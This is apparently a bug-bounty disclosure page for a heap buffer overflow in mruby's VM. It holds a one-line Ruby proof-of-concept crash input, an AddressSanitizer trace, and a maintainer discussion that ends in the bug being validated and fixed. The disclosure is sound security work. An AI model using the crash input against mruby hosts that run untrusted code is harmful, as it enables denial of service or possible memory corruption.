Heap-based Buffer Overflow in mruby/mruby

Valid

Reported on

Sep 26th 2021


Description

Heap buffer overflow on mrb-vm-exec

Proof of Concept

// poc.rb
1.times{{}until%  ;break}

Result

./mruby poc.rb
=================================================================
==1451==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000023d9 at pc 0x55b2fc3f1046 bp 0x7ffc900b52f0 sp 0x7ffc900b52e0
READ of size 1 at 0x6020000023d9 thread T0
    #0 0x55b2fc3f1045 in mrb_vm_exec /root/master/asanruby/src/vm.c:1357
    #1 0x55b2fc3e8182 in mrb_vm_run /root/master/asanruby/src/vm.c:1032
    #2 0x55b2fc42949c in mrb_top_run /root/master/asanruby/src/vm.c:2969
    #3 0x55b2fc455e2f in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6896
    #4 0x55b2fc45611d in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6939
    #5 0x55b2fc354092 in main /root/master/asanruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #6 0x7f847dd860b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #7 0x55b2fc35142d in _start (/root/master/asanruby/bin/mruby+0xbd42d)

0x6020000023d9 is located 0 bytes to the right of 9-byte region [0x6020000023d0,0x6020000023d9)
allocated by thread T0 here:
    #0 0x7f847e1adffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe)
    #1 0x55b2fc3ddf2c in mrb_default_allocf /root/master/asanruby/src/state.c:68
    #2 0x55b2fc3d3e72 in mrb_realloc_simple /root/master/asanruby/src/gc.c:226
    #3 0x55b2fc462359 in codegen_realloc /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:164
    #4 0x55b2fc48df9b in scope_finish /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:3629
    #5 0x55b2fc47e0a3 in lambda_body /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:1449
    #6 0x55b2fc4827f5 in codegen /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:2145
    #7 0x55b2fc47ef85 in gen_call /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:1606
    #8 0x55b2fc484267 in codegen /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:2382
    #9 0x55b2fc481719 in codegen /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:2010
    #10 0x55b2fc47e1d1 in scope_body /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:1458
    #11 0x55b2fc484233 in codegen /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:2377
    #12 0x55b2fc48f58f in generate_code /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:3782
    #13 0x55b2fc48f967 in mrb_generate_code /root/master/asanruby/mrbgems/mruby-compiler/core/codegen.c:3805
    #14 0x55b2fc45594a in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6871
    #15 0x55b2fc45611d in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6939
    #16 0x55b2fc354092 in main /root/master/asanruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #17 0x7f847dd860b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/master/asanruby/src/vm.c:1357 in mrb_vm_exec
Shadow bytes around the buggy address:
  0x0c047fff8420: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 00
  0x0c047fff8430: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff8440: fa fa fd fd fa fa 00 00 fa fa fd fd fa fa 00 fa
  0x0c047fff8450: fa fa 00 fa fa fa 07 fa fa fa fd fd fa fa 00 fa
  0x0c047fff8460: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa fd fd
=>0x0c047fff8470: fa fa 04 fa fa fa 00 00 fa fa 00[01]fa fa 00 fa
  0x0c047fff8480: fa fa 02 fa fa fa 00 04 fa fa 04 fa fa fa 00 fa
  0x0c047fff8490: fa fa 00 fa fa fa 02 fa fa fa fa fa fa fa fa fa
  0x0c047fff84a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1451==ABORTING
We have contacted a member of the mruby team and are waiting to hear back a year ago

Although I appreciate the report, I am not sure if this is a vulnerability. It's absolutely OK for me to mark this report valid to show appreciation, but is it OK for hundr.dev policy?


What do you think, @admin?

Jamie Slome
a year ago

Admin


@matz - thanks for the question.

Please only mark reports as valid if they are legitimate security issues.

Otherwise, I would recommend marking it as invalid.

Cheers! 🎊


OK, since this is found before the release, I mark this as invalid. But the bug will be fixed soon. Thank you @wiz123!


In some cases, mruby is used to run untrusted code (e.g. mruby-engine). So a mere crash can be a security vulnerability. So this issue should be considered valid. Sorry for the confusion @wiz123.

Yukihiro "Matz" Matsumoto validated this vulnerability a year ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto marked this as fixed with commit 368e8c a year ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation